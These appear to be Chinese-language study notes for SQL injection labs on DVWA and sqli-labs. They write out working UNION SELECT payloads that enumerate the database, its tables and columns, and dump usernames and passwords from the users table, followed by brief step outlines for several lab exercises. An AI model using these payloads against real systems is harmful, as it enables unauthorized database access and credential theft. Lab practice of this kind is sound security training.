DVWA訓練基礎 low級別
1.參照上文確定當前庫
1' union select (select database()),2 -- -
2.確定庫後,爆表
1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -
3.確定表後,爆字段
1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -
4.確定字段後,進行拖庫
1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -
以sqli-labs-master作爲練習
第一步,使用拼接的方式決定注入類型 ( 第二題)
‘
第二部,使用order by確定有表單有幾列值
order by根據指定的列對結果集進行排序
第三步,使用union select 來找到內容,獲取想要得到內容
union select :聯合查詢
進階,通過mysql注入獲取表單內容,託庫;
第一步:通過數據庫語句進行搜索,首先確定數據庫
第二部:確定數據庫後,爆出它的表;
第三步:確定表以後,可根據實際需求爆表,這裏以users舉例,進行爆字段
第四部:確定字段後,我們就可以拖庫
(第一題)
尋找sql注入點(第三題)
判斷顯示位,經過排除發現他的顯示位是3列
查詢到數據庫名,用戶名
查詢所有數據庫名,表名
拖庫
第四題
尋找sql注入點
判斷顯示位,經過排除發現他的顯示位是3列
進行下一步操作,讓他顯示第二行數據
查詢所有數據庫名,表名